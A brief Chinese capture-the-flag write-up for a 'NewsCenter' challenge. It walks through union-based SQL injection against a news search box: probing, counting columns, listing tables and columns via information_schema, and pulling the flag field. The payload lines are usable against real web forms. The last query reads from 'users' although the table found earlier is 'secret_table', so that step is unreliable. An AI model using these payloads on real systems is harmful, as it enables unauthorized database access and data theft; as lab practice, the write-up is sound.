NewsCenter
进入后我们发现有一个搜索框进行新闻搜索我们尝试有无sql注入
我们输入1’ and 1=1 #判断有无sql注入发现有
查看列数1’ order by 3 #
联合查询 1’ union select 1,2,3 #
查表:
1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #
查字段:
1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘secret_table’ #
查看字段值
1’ union select 1,2,(select group_concat(id,0x3a,fl4g) from users) #
flag:
QCTF{sq1_inJec7ion_ezzz}